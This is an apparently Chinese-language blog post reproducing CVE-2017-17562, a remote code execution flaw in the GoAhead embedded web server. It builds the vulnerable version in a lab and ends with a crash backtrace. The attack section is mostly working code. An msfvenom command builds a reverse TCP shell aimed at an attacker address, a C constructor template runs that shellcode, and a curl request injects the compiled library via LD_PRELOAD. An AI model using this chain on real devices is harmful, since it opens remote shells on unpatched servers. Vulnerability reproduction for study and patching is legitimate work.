goahead嵌入式web server CVE-2017-17562漏洞复现 2018-03-01 02:18:27 Steven Xeldax ## goahead嵌入式web server CVE-2017-17562 ### 漏洞复现: ``` git clone https://github.com/embedthis/goahead.git cd goahead/ git checkout tags/v3.6.4 -q make > /dev/null ``` ``` cd test gcc ./cgitest.c -o cgi-bin/cgitest ``` 需要注意将根目录下test文件中的route.txt和auth.txt全部写入build的bin的里面 运行 ../build/linux-x64-default/bin/goahead ### 漏洞利用: > python makemyday.py --server 10.0.3.119 --port 80 exploit --payload ./payloads/X86_64-hw.so 这个工具是用来看有没有漏洞的,可以在https://www.exploit-db.com/exploits/43360/上下载 getshell首先用msf生成payload > msfvenom -p linux/x64/shell/reverse_tcp lhost=192.168.200.1 lport=4443 -f c 编译成反弹sehll的动态链接库, pyload模板: ``` #include <unistd.h> #include <stdlib.h> static void before_main(void) __attribute__((constructor)); static void before_main(void) { //复制msf生成的shellcode到这里 //加载数组名为buf shellcode并执行 ((void(*)(void))&buf)(); } ``` > gcc -shared -fPIC ./payload.c -o payload.so -z execstack 带着反弹sehll的动态链接库访问kali上的goahead > curl -X POST --data-binary @payload.so http://192.168.200.128/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i | head ### 漏洞原理: https://www.elttam.com.au/blog/goahead/ http://www.freebuf.com/articles/web/157846.html ### 后记: getshell后将shell断开会core dump ``` *** Error in `./goahead': double free or corruption (fasttop): 0x000000000244f280 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc13ef7f7e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc13ef8837a] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc13ef8c53c] /root/vul_goAhead/goahead/build/linux-x64-default/bin/libgo.so(wfree+0x1f)[0x7fc13f2ec36c] /root/vul_goAhead/goahead/build/linux-x64-default/bin/libgo.so(websError+0x21a)[0x7fc13f2fb54d] /root/vul_goAhead/goahead/build/linux-x64-default/bin/libgo.so(websCgiPoll+0xa8)[0x7fc13f2efedd] /root/vul_goAhead/goahead/build/linux-x64-default/bin/libgo.so(websServiceEvents+0x4d)[0x7fc13f2f61a1] ./goahead(main+0x561)[0x401567] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc13ef28830] ./goahead(_start+0x29)[0x400f39] ======= Memory map: ======== 00400000-00402000 r-xp 00000000 08:01 888370 /root/vul_goAhead/goahead/build/linux-x64-default/bin/goahead 00602000-00603000 r--p 00002000 08:01 888370 /root/vul_goAhead/goahead/build/linux-x64-default/bin/goahead 00603000-00604000 rw-p 00003000 08:01 888370 /root/vul_goAhead/goahead/build/linux-x64-default/bin/goahead 0243d000-0245e000 rw-p 00000000 00:00 0 [heap] 7fc138000000-7fc138021000 rw-p 00000000 00:00 0 7fc138021000-7fc13c000000 ---p 00000000 00:00 0 7fc13e8c3000-7fc13e8d9000 r-xp 00000000 08:01 923289 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fc13e8d9000-7fc13ead8000 ---p 00016000 08:01 923289 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fc13ead8000-7fc13ead9000 rw-p 00015000 08:01 923289 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fc13ead9000-7fc13eae4000 r-xp 00000000 08:01 923350 /lib/x86_64-linux-gnu/libnss_files-2.23.so 7fc13eae4000-7fc13ece3000 ---p 0000b000 08:01 923350 /lib/x86_64-linux-gnu/libnss_files-2.23.so 7fc13ece3000-7fc13ece4000 r--p 0000a000 08:01 923350 /lib/x86_64-linux-gnu/libnss_files-2.23.so 7fc13ece4000-7fc13ece5000 rw-p 0000b000 08:01 923350 /lib/x86_64-linux-gnu/libnss_files-2.23.so 7fc13ece5000-7fc13eceb000 rw-p 00000000 00:00 0 7fc13eceb000-7fc13ed03000 r-xp 00000000 08:01 923397 /lib/x86_64-linux-gnu/libpthread-2.23.so 7fc13ed03000-7fc13ef02000 ---p 00018000 08:01 923397 /lib/x86_64-linux-gnu/libpthread-2.23.so 7fc13ef02000-7fc13ef03000 r--p 00017000 08:01 923397 /lib/x86_64-linux-gnu/libpthread-2.23.so 7fc13ef03000-7fc13ef04000 rw-p 00018000 08:01 923397 /lib/x86_64-linux-gnu/libpthread-2.23.so 7fc13ef04000-7fc13ef08000 rw-p 00000000 00:00 0 7fc13ef08000-7fc13f0c8000 r-xp 00000000 08:01 923251 /lib/x86_64-linux-gnu/libc-2.23.so 7fc13f0c8000-7fc13f2c8000 ---p 001c0000 08:01 923251 /lib/x86_64-linux-gnu/libc-2.23.so 7fc13f2c8000-7fc13f2cc000 r--p 001c0000 08:01 923251 /lib/x86_64-linux-gnu/libc-2.23.so 7fc13f2cc000-7fc13f2ce000 rw-p 001c4000 08:01 923251 /lib/x86_64-linux-gnu/libc-2.23.so 7fc13f2ce000-7fc13f2d2000 rw-p 00000000 00:00 0 7fc13f2d2000-7fc13f387000 r-xp 00000000 08:01 888358 /root/vul_goAhead/goahead/build/linux-x64-default/bin/libgo.so 7fc13f387000-7fc13f587000 ---p 000b5000 08:01 888358 /root/vul_goAhead/goahead/build/linux-x64-default/bin/libgo.so 7fc13f587000-7fc13f58a000 r--p 000b5000 08:01 888358 /root/vul_goAhead/goahead/build/linux-x64-default/bin/libgo.so 7fc13f58a000-7fc13f58d000 rw-p 000b8000 08:01 888358 /root/vul_goAhead/goahead/build/linux-x64-default/bin/libgo.so 7fc13f58d000-7fc13f590000 rw-p 00000000 00:00 0 7fc13f590000-7fc13f5b6000 r-xp 00000000 08:01 923223 /lib/x86_64-linux-gnu/ld-2.23.so 7fc13f798000-7fc13f79c000 rw-p 00000000 00:00 0 7fc13f7b2000-7fc13f7b5000 rw-p 00000000 00:00 0 7fc13f7b5000-7fc13f7b6000 r--p 00025000 08:01 923223 /lib/x86_64-linux-gnu/ld-2.23.so 7fc13f7b6000-7fc13f7b7000 rw-p 00026000 08:01 923223 /lib/x86_64-linux-gnu/ld-2.23.so 7fc13f7b7000-7fc13f7b8000 rw-p 00000000 00:00 0 7ffcb91ae000-7ffcb91cf000 rw-p 00000000 00:00 0 [stack] 7ffcb91f2000-7ffcb91f4000 r--p 00000000 00:00 0 [vvar] 7ffcb91f4000-7ffcb91f6000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Aborted (core dumped) ```
